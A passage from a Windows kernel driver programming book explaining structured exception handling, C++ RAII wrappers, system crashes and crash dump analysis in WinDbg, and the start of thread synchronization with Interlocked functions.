processor to raise an error. Exceptions are in some ways similar to interrupts, the main difference being
that an exception is synchronous and technically reproducible under the same conditions, whereas an
interrupt is asynchronous and can arrive at any time. Examples of exceptions include division by zero,
breakpoint, page fault, stack overflow and invalid instruction.
Chapter 6: Kernel Mechanisms
141
If an exception occurs, the kernel catches this and allows code to handle the exception, if possible. This
mechanism is called Structured Exception Handling (SEH) and is available for user-mode code as well as
kernel-mode code.
The kernel exception handlers are called based on the Interrupt Dispatch Table (IDT), the same one holding
mapping between interrupt vectors and ISRs. Using a kernel debugger, the !idt command shows all these
mappings. The low numbered interrupt vectors are in fact exception handlers. Here’s a sample output from
this command:
lkd> !idt
Dumping IDT: fffff8011d941000
00: fffff8011dd6c100 nt!KiDivideErrorFaultShadow
01: fffff8011dd6c180 nt!KiDebugTrapOrFaultShadow
Stack = 0xFFFFF8011D9459D0
02: fffff8011dd6c200 nt!KiNmiInterruptShadow
Stack = 0xFFFFF8011D9457D0
03: fffff8011dd6c280 nt!KiBreakpointTrapShadow
04: fffff8011dd6c300 nt!KiOverflowTrapShadow
05: fffff8011dd6c380 nt!KiBoundFaultShadow
06: fffff8011dd6c400 nt!KiInvalidOpcodeFaultShadow
07: fffff8011dd6c480 nt!KiNpxNotAvailableFaultShadow
08: fffff8011dd6c500 nt!KiDoubleFaultAbortShadow
Stack = 0xFFFFF8011D9453D0
09: fffff8011dd6c580 nt!KiNpxSegmentOverrunAbortShadow
0a: fffff8011dd6c600 nt!KiInvalidTssFaultShadow
0b: fffff8011dd6c680 nt!KiSegmentNotPresentFaultShadow
0c: fffff8011dd6c700 nt!KiStackFaultShadow
0d: fffff8011dd6c780 nt!KiGeneralProtectionFaultShadow
0e: fffff8011dd6c800 nt!KiPageFaultShadow
10: fffff8011dd6c880 nt!KiFloatingErrorFaultShadow
11: fffff8011dd6c900 nt!KiAlignmentFaultShadow
(truncated)
Note the function names - most are very descriptive. These entries are connected to Intel/AMD (in this
example) faults. Some common examples of exceptions include:
• Division by zero (0)
• Breakpoint (3) - the kernel handles this transparently, passing control to an attached debugger (if
any).
• Invalid opcode (6) - this fault is raised by the CPU if it encounters an unknown instruction.
• Page fault (14) - this fault is raised by the CPU if the page table entry used for translating virtual to
physical addresses has the Valid bit set to zero, indicating (as far as the CPU is concerned) that the
page is not resident in physical memory.
Chapter 6: Kernel Mechanisms
142
Some other exceptions are raised by the kernel as a result of a previous CPU fault. For example, if a page
fault is raised, the Memory Manager’s page fault handler will try to locate the page that is not resident in
RAM. If the page happens not to exist at all, the Memory Manager will raise an Access Violation exception.
Once an exception is raised, the kernel searches the function where the exception occurred for a handler
(except for some exceptions which it handles transparently, such as Breakpoint (3)). If not found, it will
search up the call stack, until such handler is found. If the call stack is exhausted, the system will crash.
How can a driver handle these types of exceptions? Microsoft added four keywords to the C language to
allow developers to handle such exceptions, as well as have code execute no matter what. Table 6-1 shows
the added keywords with a brief description.
Table 6-1: Keywords for working with SEH
Keyword
Description
__try
Starts a block of code where exceptions may occur.
__except
Indicates if an exception is handled, and provides the handling code if it is.
__finally
Unrelated to exceptions directly. Provides code that is guaranteed to execute no matter what -
whether the __try block is exited normally, with a return statement, or because of an
exception.
__leave
Provides an optimized mechanism to jump to the __finally block from somewhere within a
__try block.
The valid combination of keywords is __try/__except and __try/__finally. However, these can be
combined by using nesting to any level.
These same keywords work in user mode as well, in much the same way.
Using __try/__except
In chapter 4, we implemented a driver that accesses a user-mode buffer to get data needed for the driver’s
operation. We used a direct pointer to the user’s buffer. However, this is not guaranteed to be safe. For
example, the user-mode code (say from another thread) could free the buffer, just before the driver accesses
it. In such a case, the driver would cause a system crash, essentially because of a user’s error (or malicious
intent). Since user data should never be trusted, such access should be wrapped in a __try/__except
block to make sure a bad buffer does not crash the driver.
Here is the important part of a revised IRP_MJ_WRITE handler using an exception handler:
Chapter 6: Kernel Mechanisms
143
do {
if (irpSp->Parameters.Write.Length < sizeof(ThreadData)) {
status = STATUS_BUFFER_TOO_SMALL;
break;
}
auto data = (ThreadData*)Irp->UserBuffer;
if (data == nullptr) {
status = STATUS_INVALID_PARAMETER;
break;
}
__try {
if (data->Priority < 1 || data->Priority > 31) {
status = STATUS_INVALID_PARAMETER;
break;
}
PETHREAD Thread;
status = PsLookupThreadByThreadId(
ULongToHandle(data->ThreadId), &Thread);
if (!NT_SUCCESS(status))
break;
KeSetPriorityThread((PKTHREAD)Thread, data->Priority);
ObDereferenceObject(Thread);
KdPrint(("Thread Priority change for %d to %d succeeded!\n",
data->ThreadId, data->Priority));
break;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
// probably something wrong with the buffer
status = STATUS_ACCESS_VIOLATION;
}
} while(false);
Placing EXCEPTION_EXECUTE_HANDLER in __except says that any exception is to be handled. We can
be more selective by calling GetExceptionCode and looking at the actual exception. If we don’t expect
this, we can tell the kernel to continue looking for handlers up the call stack:
__except (GetExceptionCode() == STATUS_ACCESS_VIOLATION
? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
// handle exception
}
Does all this mean that the driver can catch any and all exceptions? If so, the driver will never cause a
system crash. Fortunately (or unfortunately, depending on your perspective), this is not the case. Access
Chapter 6: Kernel Mechanisms
144
violation, for example, is something that can only be caught if the violated address is in user space. If it’s
in kernel space, it cannot be caught and still cause a system crash. This makes sense, since something bad
has happened and the kernel will not let the driver get away with it. User mode addresses, on the other
hand, are not at the control of the driver, so such exceptions can be caught and handled.
The SEH mechanism can also be used by drivers (and user-mode code) to raise custom exceptions. The
kernel provides the generic function ExRaiseStatus to raise any exception and some specific functions
like ExRaiseAccessViolation:
void ExRaiseStatus(NTSTATUS Status);
A driver can also crash the system explicitly if it concludes that something really bad going on, such as data
being corrupted from underneath the driver. The kernel provides the KeBugCheckEx for this purpose:
VOID KeBugCheckEx(
_In_ ULONG BugCheckCode,
_In_ ULONG_PTR BugCheckParameter1,
_In_ ULONG_PTR BugCheckParameter2,
_In_ ULONG_PTR BugCheckParameter3,
_In_ ULONG_PTR BugCheckParameter4);
KeBugCheckEx is the normal kernel function that generates a crash. BugCheckCode is the crash code to
be reported, and the other 4 numbers can provide more details about the crash. If the bugcheck code is one
of those documented by Microsoft, the meaning of the other 4 numbers must be provided as documented.
(See the next section System Crash for more details).
Using __try/__finally
Using a block of __try and __finally is not directly related to exceptions. This is about making sure
some piece of code executes no matter what - whether the code exits cleanly or mid-way because of an
exception. This is similar in concept to the finally keyword popular in some high level languages (e.g.
Java, C#). Here is a simple example to show the problem:
void foo() {
void* p = ExAllocatePoolWithTag(PagedPool, 1024, DRIVER_TAG);
if(p == nullptr)
return;
// do something with p
ExFreePool(p);
}
The above code seems harmless enough. However, there are several issues with it:
Chapter 6: Kernel Mechanisms
145
• If an exception is thrown between the allocation and the release, a handler in the caller will be
searched, but the memory will not be freed.
• If a return statement is used in some conditional between the allocation and release, the buffer
will not be freed. This requires the code to be careful to make sure all exit points from the function
pass through the code freeing the buffer.
The second bullet can be implemented with careful coding, but is a burden best avoided. The first bullet
cannot be handled with standard coding techniques. This is where __try/__finally come in. Using
this combination, we can make sure the buffer is freed no matter what happens in the __try block:
void foo() {
void* p = ExAllocatePoolWithTag(PagedPool, 1024, DRIVER_TAG);
if(p == nullptr)
return;
__try {
// do something with p
}
__finally {
// called no matter what
ExFreePool(p);
}
}
With the above code in place, even if return statements appear within the __try body, the __finally
code will be called before actually returning from the function. If some exception occurs, the __finally
block runs first before the kernel searches up the call stack for possible handlers.
__try/__finally is useful not just with memory allocations, but also with other resources, where some
acquisition and release need to take place. One common example is when synchronizing threads accessing
some shared data. Here is an example of acquiring and releasing a fast mutex (fast mutex and other
synchronization primitives are described later in this chapter):
FAST_MUTEX MyMutex;
void foo() {
ExAcquireFastMutex(&MyMutex);
__try {
// do work while the fast mutex is held
}
__finally {
ExReleaseFastMutex(&MyMutex);
}
}
Chapter 6: Kernel Mechanisms
146
Using C++ RAII Instead of __try / __finally
Although the preceding examples with __try/__finally work, they are not terribly convenient. Using
C++ we can build RAII wrappers that do the right thing without the need to use __try/__finally. C++
does not have a finally keyword like C# or Java, but it doesn’t need one - it has destructors.
Here is a very simple, bare minimum, example that manages a buffer allocation with a RAII class:
template<typename T = void>
struct kunique_ptr {
explicit kunique_ptr(T* p = nullptr) : _p(p) {}
~kunique_ptr() {
if (_p)
ExFreePool(_p);
}
T* operator->() const {
return _p;
}
T& operator*() const {
return *_p;
}
private:
T* _p;
};
The class uses templates to allow working easily with any type of data. An example usage follows:
struct MyData {
ULONG Data1;
HANDLE Data2;
};
void foo() {
// take charge of the allocation
kunique_ptr<MyData> data((MyData*)ExAllocatePool(PagedPool, sizeof(MyData))\
);
// use the pointer
data->Data1 = 10;
// when the object goes out of scope, the destructor frees the buffer
}
Chapter 6: Kernel Mechanisms
147
If you don’t normally use C++ as your primary programming language, you may find the above code
confusing. You can continue working with __try/__finally, but I recommend getting acquainted
with this type of code. In any case, even if you struggle with the implementation of kunique_ptr
above, you can still use it without needing to understand every little detail.
The kunique_ptr type presented above is a bare minimum. You should also remove the copy constructor
and copy assignment, and allow move copy and assignment (C++ 11 and later, for ownership transfer). Here
is a more complete implementation:
template<typename T = void>
struct kunique_ptr {
explicit kunique_ptr(T* p = nullptr) : _p(p) {}
// remove copy ctor and copy = (single owner)
kunique_ptr(const kunique_ptr&) = delete;
kunique_ptr& operator=(const kunique_ptr&) = delete;
// allow ownership transfer
kunique_ptr(kunique_ptr&& other) : _p(other._p) {
other._p = nullptr;
}
kunique_ptr& operator=(kunique_ptr&& other) {
if (&other != this) {
Release();
_p = other._p;
other._p = nullptr;
}
return *this;
}
~kunique_ptr() {
Release();
}
operator bool() const {
return _p != nullptr;
}
T* operator->() const {
Chapter 6: Kernel Mechanisms
148
return _p;
}
T& operator*() const {
return *_p;
}
void Release() {
if (_p)
ExFreePool(_p);
}
private:
T* _p;
};
We’ll build other RAII wrappers for synchronization primitives later in this chapter.
Using C++ RAII wrappers has one missing piece - if an exception occurs, the destructor will not
be called, so a leak of some sort occurs. The reason this does not work (as it does in user-mode),
is the lack of a C++ runtime and the current inability of the compiler to set up elaborate code
with __try/__finally to mimic this effect. Even so, it’s still very useful, as in many cases
exceptions are not expected, and even if they are, no handler exists in the driver for that and
the system should probably crash anyway.
System Crash
As we already know, if an unhandled exception occurs in kernel mode, the system crashes, typically with
the “Blue Screen of Death” (BSOD) showing its face (on Windows 8+, that’s literally a face - saddy or
frowny - the inverse of smiley). In this section, we’ll discuss what happens when the system crashes and
how to deal with it.
The system crash has many names, all meaning the same thing - “Blue screen of Death”, “System failure”,
“Bugcheck”, “Stop error”. The BSOD is not some punishment, as may seem at first, but a protection
mechanism. If kernel code, which is supposed to be trusted, did something bad, stopping everything
is probably the safest approach, as perhaps letting the code continue roaming around may result in an
unbootable system if some important files or Registry data is corrupted.
Recent versions of Windows 10 have some alternate colors for when the system crashes. Green is used
for insider preview builds, and I actually encountered a pink as well (power-related errors).
Chapter 6: Kernel Mechanisms
149
If the crashed system is connected to a kernel debugger, the debugger will break. This allows examining
the state of the system before other actions take place.
The system can be configured to perform some operations if the system crashes. This can be done with the
System Properties UI on the Advanced tab. Clicking Settings… at the Startup and Recovery section brings
the Startup and Recovery dialog where the System Failure section shows the available options. Figure 6-7
shows these two dialogs.
Figure 6-7: Startup and recovery settings
If the system crashes, an event entry can be written to the event log. It’s checked by default, and there is
no good reason to change it. The system is configured to automatically restart; this has been the default
since Windows 2000.
The most important setting is the generation of a dump file. The dump file captures the system state at the
time of the crash, so it can later be analyzed by loading the dump file into the debugger. The type of the
dump file is important since it determines what information will be present in the dump. The dump is not
written to the target file at crash time, but instead written to the first page file.
Only when the system restarts, the kernel notices there is dump information in the page file, and it copies
the data to the target file. The reason has to do with the fact that at system crash time it may be too
dangerous to write something to a new file (or overwrite an existing file); the I/O system may not be stable
enough. The best bet is to write the data to a page file, which is already open anyway. The downside is that
the page file must be large enough to contain the dump, otherwise the dump file will not be generated.
The dump file contains physical memory only.
Chapter 6: Kernel Mechanisms
150
The dump type determines what data would be written and hints at the page file size that may be required.
Here are the options:
• Small memory dump (256 KB on Windows 8 and later, 64 KB on older systems) - a very minimal
dump, containing basic system information and information on the thread that caused the crash.
Usually this is too little to determine what happened in all but the most trivial cases. The upside is
that the file is small, so it can be easily moved.
• Kernel memory dump - this is the default on Windows 7 and earlier versions. This setting captures
all kernel memory but no user memory. This is usually good enough, since a system crash can only
be caused by kernel code misbehaving. It’s extremely unlikely that user-mode had anything to do
with it.
• Complete memory dump - this provides a dump of all physical memory, user memory and kernel
memory. This is the most complete information available. The downside is the size of the dump,
which could be gigantic depending on the size of RAM (the total size of the final file). The obvious
optimization is not to include unused pages, but Complete Memory Dump does not do that.
• Automatic memory dump (Windows 8+) - this is the default on Windows 8 and later. This is the
same as kernel memory dump, but the kernel resizes the page file on boot to a size that guarantees
with high probability that the page file size would be large enough to contain a kernel dump. This
is only done if the page file size is specified as “System managed” (the default).
• Active memory dump (Windows 10+) - this is similar to a complete memory dump, with two
exceptions. First, unused pages re not written. Second, if the crashed system is hosting guest virtual
machines, the memory they were using at the time is not captured (as it’s unlikely these have
anything to do with the host crashing). These optimizations help in reducing the dump file size.
Crash Dump Information
Once you have a crash dump in hand, you can open it in WinDbg by selecting File/Open Dump File and
navigating to the file. The debugger will spew some basic information similar to the following:
Microsoft (R) Windows Debugger Version 10.0.18317.1001 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\Windows\MEMORY.DMP]
Kernel Bitmap Dump File: Kernel address space is available, User address space \
may not be available.
************* Path validation summary **************
Response
Time (ms)
Location
Deferred
SRV*c:\Symbols*http://msdl.micro\
soft.com/download/symbols
Symbol search path is: SRV*c:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 10 Kernel Version 18362 MP (4 procs) Free x64
Product: WinNt, suite: TerminalServer SingleUserTS
Chapter 6: Kernel Mechanisms
151
Built by: 18362.1.amd64fre.19h1_release.190318-1202
Machine Name:
Kernel base = 0xfffff803`70abc000 PsLoadedModuleList = 0xfffff803`70eff2d0
Debug session time: Wed Apr 24 15:36:55.613 2019 (UTC + 3:00)
System Uptime: 0 days 0:05:38.923
Loading Kernel Symbols
....................................Page 2001b5efc too large to be in the dump \
file.
Page 20001ebfb too large to be in the dump file.
...............................
Loading User Symbols
PEB is paged out (Peb.Ldr = 00000054`34256018).
Type ".hh dbgerr001" for detai\
ls
Loading unloaded module list
.............
For analysis of this file, run !analyze -v
nt!KeBugCheckEx:
fffff803`70c78810 48894c2408
mov
qword ptr [rsp+8],rcx ss:fffff988`53b\
0f6b0=000000000000000a
The debugger suggests running !analyze -v and it’s the most common thing to do at the start of dump
analysis. Notice the call stack is at KeBugCheckEx, which is the function generating the bugcheck.
The default logic behind !analyze -v performs basic analysis on the thread that caused the crash and
shows a few pieces of information related to the crash dump code:
2: kd> !analyze -v
*******************************************************************************
*
*
*
Bugcheck Analysis
*
*
*
*******************************************************************************
DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.
This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: ffffd907b0dc7660, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000000, value 0 = read operation, 1 = write operation
Arg4: fffff80375261530, address which referenced memory
Chapter 6: Kernel Mechanisms
152
Debugging Details:
------------------
(truncated)
DUMP_TYPE:
1
BUGCHECK_P1: ffffd907b0dc7660
BUGCHECK_P2: 2
BUGCHECK_P3: 0
BUGCHECK_P4: fffff80375261530
READ_ADDRESS: Unable to get offset of nt!_MI_VISIBLE_STATE.SpecialPool
Unable to get value of nt!_MI_VISIBLE_STATE.SessionSpecialPool
ffffd907b0dc7660 Paged pool
CURRENT_IRQL:
2
FAULTING_IP:
myfault+1530
fffff803`75261530 8b03
mov
eax,dword ptr [rbx]
(truncated)
ANALYSIS_VERSION: 10.0.18317.1001 amd64fre
TRAP_FRAME:
fffff98853b0f7f0 -- (.trap 0xfffff98853b0f7f0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=ffffd90797400340
rdx=0000000000000880 rsi=0000000000000000 rdi=0000000000000000
rip=fffff80375261530 rsp=fffff98853b0f980 rbp=0000000000000002
r8=ffffd9079c5cec10
r9=0000000000000000 r10=ffffd907974002c0
r11=ffffd907b0dc1650 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0
nv up ei ng nz na po nc
myfault+0x1530:
fffff803`75261530 8b03
mov
eax,dword ptr [rbx] ds:00000000`00000\
000=????????
Resetting default scope
Chapter 6: Kernel Mechanisms
153
LAST_CONTROL_TRANSFER:
from fffff80370c8a469 to fffff80370c78810
STACK_TEXT:
fffff988`53b0f6a8 fffff803`70c8a469 : 00000000`0000000a ffffd907`b0dc7660 00000\
000`00000002 00000000`00000000 : nt!KeBugCheckEx
fffff988`53b0f6b0 fffff803`70c867a5 : ffff8788`e4604080 ffffff4c`c66c7010 00000\
000`00000003 00000000`00000880 : nt!KiBugCheckDispatch+0x69
fffff988`53b0f7f0 fffff803`75261530 : ffffff4c`c66c7000 00000000`00000000 fffff\
988`53b0f9e0 00000000`00000000 : nt!KiPageFault+0x465
fffff988`53b0f980 fffff803`75261e2d : fffff988`00000000 00000000`00000000 ffff8\
788`ec7cf520 00000000`00000000 : myfault+0x1530
fffff988`53b0f9b0 fffff803`75261f88 : ffffff4c`c66c7010 00000000`000000f0 00000\
000`00000001 ffffff30`21ea80aa : myfault+0x1e2d
fffff988`53b0fb00 fffff803`70ae3da9 : ffff8788`e6d8e400 00000000`00000001 00000\
000`83360018 00000000`00000001 : myfault+0x1f88
fffff988`53b0fb40 fffff803`710d1dd5 : fffff988`53b0fec0 ffff8788`e6d8e400 00000\
000`00000001 ffff8788`ecdb6690 : nt!IofCallDriver+0x59
fffff988`53b0fb80 fffff803`710d172a : ffff8788`00000000 00000000`83360018 00000\
000`00000000 fffff988`53b0fec0 : nt!IopSynchronousServiceTail+0x1a5
fffff988`53b0fc20 fffff803`710d1146 : 00000054`344feb28 00000000`00000000 00000\
000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x5ca
fffff988`53b0fd60 fffff803`70c89e95 : ffff8788`e4604080 fffff988`53b0fec0 00000\
054`344feb28 fffff988`569fd630 : nt!NtDeviceIoControlFile+0x56
fffff988`53b0fdd0 00007ff8`ba39c147 : 00000000`00000000 00000000`00000000 00000\
000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25
00000054`344feb48 00000000`00000000 : 00000000`00000000 00000000`00000000 00000\
000`00000000 00000000`00000000 : 0x00007ff8`ba39c147
(truncated)
FOLLOWUP_IP:
myfault+1530
fffff803`75261530 8b03
mov
eax,dword ptr [rbx]
FAULT_INSTR_CODE:
8d48038b
SYMBOL_STACK_INDEX:
3
SYMBOL_NAME:
myfault+1530
FOLLOWUP_NAME:
MachineOwner
Chapter 6: Kernel Mechanisms
154
MODULE_NAME: myfault
IMAGE_NAME:
myfault.sys
(truncated)
Every crash dump code can have up to 4 numbers that provide more information about the crash. In this
case, we can see the code is DRIVER_IRQL_NOT_LESS_OR_EQUAL (0xd1) and the next four numbers
named Arg1 through Arg4 mean (in order): memory referenced, the IRQL at the time of the call, read vs.
write operation and the accessing address.
The command clearly recognizes myfault.sys as the faulting module (driver). That’s because this is an easy
crash - the culprit is on the call stack as can be seen in the STACK TEXT section above (you can also simply
use the k command to see it again).
The !analyze -v command is extensible and it’s possible to add more analysis to that
command using an extension DLL. You may be able to find such extensions on the web. Consult
the debugger API documentation for more information on how to add your own analysis code
to this command.
More complex crash dumps may show calls from the kernel only on the call stack of the offending thread.
Before you conclude that you found a bug in the Windows kernel, consider this more likely scenario: A
driver did something that was not fatal in itself, such as experience a buffer overflow - wrote data beyond
its allocated buffer, but unfortunately ,the memory following that buffer was allocated by some other
driver or the kernel, and so nothing bad happened at that time. Some time later, the kernel accessed that
memory and got bad data and caused a system crash. But the faulting driver is nowhere to be found on
any call stack; this is much harder to diagnose.
One way to help diagnose such issues is using Driver Verifier. We’ll look at the basics of Driver
Verifier in module 12.
Once you get the crash dump code, it’s helpful to look in the debugger documentation at the
topic “Bugcheck Code Reference”, where common bugcheck codes are explained more fully
with typical causes and ideas on what to investigate next.
Analyzing a Dump File
A dump file is a snapshot of a system’s memory. Other than that, it’s the same as any other kernel
debugging session. You just can’t set breakpoints, and certainly cannot use any go command. All other
commands are available as usual. Commands such as !process, !thread, lm, k can be used normally.
Here are some other commands and tips:
• The prompt indicates the current processor. Switching processors can be done with the command
∼ns where n is the CPU index (it looks like switching threads in user mode).
Chapter 6: Kernel Mechanisms
155
• The !running command can be used to list the threads that were running on all processors at the
time of the crash. Adding -t as an option shows the call stack for each thread. Here is an example
with the above crash dump:
2: kd> !running -t
System Processors:
(000000000000000f)
Idle Processors:
(0000000000000002)
Prcbs
Current
(pri) Next
(pri) Idle
0
fffff8036ef3f180
ffff8788e91cf080 ( 8)
fffff80371\
048400
................
# Child-SP
RetAddr
Call Site
00 00000094`ed6ee8a0 00000000`00000000 0x00007ff8`b74c4b57
2
ffffb000c1944180
ffff8788e4604080 (12)
ffffb000c1\
955140
................
# Child-SP
RetAddr
Call Site
00 fffff988`53b0f6a8 fffff803`70c8a469 nt!KeBugCheckEx
01 fffff988`53b0f6b0 fffff803`70c867a5 nt!KiBugCheckDispatch+0x69
02 fffff988`53b0f7f0 fffff803`75261530 nt!KiPageFault+0x465
03 fffff988`53b0f980 fffff803`75261e2d myfault+0x1530
04 fffff988`53b0f9b0 fffff803`75261f88 myfault+0x1e2d
05 fffff988`53b0fb00 fffff803`70ae3da9 myfault+0x1f88
06 fffff988`53b0fb40 fffff803`710d1dd5 nt!IofCallDriver+0x59
07 fffff988`53b0fb80 fffff803`710d172a nt!IopSynchronousServiceTail+0x1a5
08 fffff988`53b0fc20 fffff803`710d1146 nt!IopXxxControlFile+0x5ca
09 fffff988`53b0fd60 fffff803`70c89e95 nt!NtDeviceIoControlFile+0x56
0a fffff988`53b0fdd0 00007ff8`ba39c147 nt!KiSystemServiceCopyEnd+0x25
0b 00000054`344feb48 00000000`00000000 0x00007ff8`ba39c147
3
ffffb000c1c80180
ffff8788e917e0c0 ( 5)
ffffb000c1\
c91140
................
# Child-SP
RetAddr
Call Site
00 fffff988`5683ec38 fffff803`70ae3da9 Ntfs!NtfsFsdClose
01 fffff988`5683ec40 fffff803`702bb5de nt!IofCallDriver+0x59
02 fffff988`5683ec80 fffff803`702b9f16 FLTMGR!FltpLegacyProcessingAfterPreCallb\
acksCompleted+0x15e
03 fffff988`5683ed00 fffff803`70ae3da9 FLTMGR!FltpDispatch+0xb6
Chapter 6: Kernel Mechanisms
156
04 fffff988`5683ed60 fffff803`710cfe4d nt!IofCallDriver+0x59
05 fffff988`5683eda0 fffff803`710de470 nt!IopDeleteFile+0x12d
06 fffff988`5683ee20 fffff803`70aea9d4 nt!ObpRemoveObjectRoutine+0x80
07 fffff988`5683ee80 fffff803`723391f5 nt!ObfDereferenceObject+0xa4
08 fffff988`5683eec0 fffff803`72218ca7 Ntfs!NtfsDeleteInternalAttributeStream+0\
x111
09 fffff988`5683ef00 fffff803`722ff7cf Ntfs!NtfsDecrementCleanupCounts+0x147
0a fffff988`5683ef40 fffff803`722fe87d Ntfs!NtfsCommonCleanup+0xadf
0b fffff988`5683f390 fffff803`70ae3da9 Ntfs!NtfsFsdCleanup+0x1ad
0c fffff988`5683f6e0 fffff803`702bb5de nt!IofCallDriver+0x59
0d fffff988`5683f720 fffff803`702b9f16 FLTMGR!FltpLegacyProcessingAfterPreCallb\
acksCompleted+0x15e
0e fffff988`5683f7a0 fffff803`70ae3da9 FLTMGR!FltpDispatch+0xb6
0f fffff988`5683f800 fffff803`710ccc38 nt!IofCallDriver+0x59
10 fffff988`5683f840 fffff803`710d4bf8 nt!IopCloseFile+0x188
11 fffff988`5683f8d0 fffff803`710d9f3e nt!ObCloseHandleTableEntry+0x278
12 fffff988`5683fa10 fffff803`70c89e95 nt!NtClose+0xde
13 fffff988`5683fa80 00007ff8`ba39c247 nt!KiSystemServiceCopyEnd+0x25
14 000000b5`aacf9df8 00000000`00000000 0x00007ff8`ba39c247
The command gives a pretty good idea of what was going on at the time of the crash.
• The !stacks command lists all thread stacks for all threads by default. A more useful variant is a
search string that lists only threads where a module or function containing this string appears. This
allows locating driver’s code throughout the system (because it may not have been running at the
time of the crash, but it’s on some thread’s call stack). Here’s an example for the above dump:
2: kd> !stacks
Proc.Thread
.Thread
Ticks
ThreadState Blocker
[fffff803710459c0 Idle]
0.000000
fffff80371048400 0000003 RUNNING
nt!KiIdleLoop+0x15e
0.000000
ffffb000c17b1140 0000ed9 RUNNING
hal!HalProcessorIdle+0xf
0.000000
ffffb000c1955140 0000b6e RUNNING
nt!KiIdleLoop+0x15e
0.000000
ffffb000c1c91140 000012b RUNNING
nt!KiIdleLoop+0x15e
[ffff8788d6a81300 System]
4.000018
ffff8788d6b8a080 0005483 Blocked
nt!PopFxEmergencyWorker+0x3e
4.00001c
ffff8788d6bc5140 0000982 Blocked
nt!ExpWorkQueueManagerThread+0x\
127
4.000020
ffff8788d6bc9140 000085a Blocked
nt!KeRemovePriQueue+0x25c
(truncated)
Chapter 6: Kernel Mechanisms
157
2: kd> !stacks 0 myfault
Proc.Thread
.Thread
Ticks
ThreadState Blocker
[fffff803710459c0 Idle]
[ffff8788d6a81300 System]
(truncated)
[ffff8788e99070c0 notmyfault64.exe]
af4.00160c
ffff8788e4604080 0000006 RUNNING
nt!KeBugCheckEx
(truncated)
The address next to each line is the thread’s ETHREAD address that can be fed to the !thread command.
System Hang
A system crash is the most common type of dump that is typically investigated. However, there is yet
another type of dump that you may need to work with: a hung system. A hung system is a non-responsive
or near non-responsive system. Things seem to be halted or deadlocked in some way - the system does
not crash, so the first issue to deal with is how to get a dump of the system.
A dump file contains some system state, it does not have to be related to a crash or any other bad state.
There are tools (including the kernel debugger) that can generate a dump file at any time.
If the system is still responsive to some extent, the Sysinternals NotMyFault tool can force a system crash
and so force a dump file to be generated (this is in fact the way the dump in the previous section was
generated). Figure 6-8 shows a screenshot of NotMyFault. Selecting the first (default) option and clicking
Crash immediately crashes the system and will generate a dump file (if configured to do so).
Chapter 6: Kernel Mechanisms
158
Figure 6-8: NotMyFault
NotMyFault uses a driver, myfault.sys that is actually responsible for the crash.
NotMyFault has 32 and 64 bit versions (the later file name ends with “64”). Remember to use
the correct one for the system at hand, otherwise its driver will fail to load.
If the system is completely unresponsive, and you can attach a kernel debugger (the target was configured
for debugging), then debug normally or generate a dump file using the .dump command.
If the system is unresponsive and a kernel debugger cannot be attached, it’s possible to generate a crash
manually if configured in the Registry beforehand (this assumes the hang was somehow expected). When
a certain key combination is detected, the keyboard driver will generate a crash. Consult this link¹ to get
the full details. The crash code in this case is 0xe2 (MANUALLY_INITIATED_CRASH).
¹https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/forcing-a-system-crash-from-the-keyboard
Chapter 6: Kernel Mechanisms
159
Thread Synchronization
Threads sometimes need to coordinate work. A canonical example is a driver using a linked list to gather
data items. The driver can be invoked by multiple clients, coming from many threads in one or more
processes. This means manipulating the linked list must be done atomically, so it’s not corrupted. If multiple
threads access the same memory where at least one is a writer (making changes), this is referred to as a
data race. If a data race occurs, all bets are off and anything can happen. Typically, within a driver, a
system crash occurs sooner or later; data corruption is practically guaranteed.
In such a scenario, it’s essential that while one thread manipulates the linked list, all other threads back
off the linked list, and wait in some way for the first thread to finish its work. Only then another thread
(just one) can manipulate the list. This is an example of thread synchronization.
The kernel provides several primitives that help in accomplishing proper synchronization to protect
data from concurrent access. The following discussed various primitives and techniques for thread
synchronization.
Interlocked Operations
The Interlocked set of functions provide convenient operations that are performed atomically by utilizing
the hardware, which means no software objects are involved. If using these functions gets the job done,
then they should be used, as these are as efficient as they can possibly be.
Technically, these Interlocked-family of functions are called compiler intrinsincs, as they are
instructions to the processor, disguised as functions.
The same functions (intrinsics) are available in user-mode as well.
A simple example is incrementing an integer by one. Generally, this is not an atomic operation. If two (or
more) threads try to perform this at the same time on the same memory location, it’s possible (and likely)
some of the increments will be lost. Figure 6-9 shows a simple scenario where incrementing a value by 1
done from two threads ends up with result of 1 instead of 2.
Chapter 6: Kernel Mechanisms
160
Figure 6-9: Concurrent increment
The example in figure 6-9 is extremely simplistic. With real CPUs there are other effects to
consider, especially caching, which makes the shown scenario even more likely. CPU caching,
store buffers, and other aspects of modern CPUs are non-trivial topics, well beyond the scope
of this book.
Table 6-2 lists some of the Interlocked functions available for drivers use.
Table 6-2: Some Interlocked functions
Function
Description
InterlockedIncrement /
InterlockedIncrement16 /
InterlockedIncrement64
Atomically increment a 32/16/64 bit integer by one
InterlockedDecrement / 16 / 64
Atomically decrement a 32/16/64 bit integer by one.
InterlockedAdd / InterlockedAdd64
Atomically add one 32/64 bit integer to a variable.
InterlockedExchange / 8 / 16 / 64
Atomically exchange two 32/8/16/64 bit values.
InterlockedCompareExchange / 64 / 128
Atomically compare a variable with a value. If equal
exchange with the provided value and return TRUE;
otherwise, place the current value in the variable and
return FALSE.
Chapter 6: Kernel Mechanisms
161
The InterlockedCompareExchange family of functions are used in lock-free programming,
a programming technique to perform complex atomic operations without using software
objects. This topic is well beyond the scope of this book.
The functions in table 6-2 are also available in user mode, as these are not really functions, but
rather CPU intrinsics - special instructions to the CPU.
Dispatcher Objects
The kernel provides a set of primitives known as Dispatcher Objects, also called Waitable Objects. These
objects have a state, either signaled or non-signaled, where the meaning of signaled and non-signaled
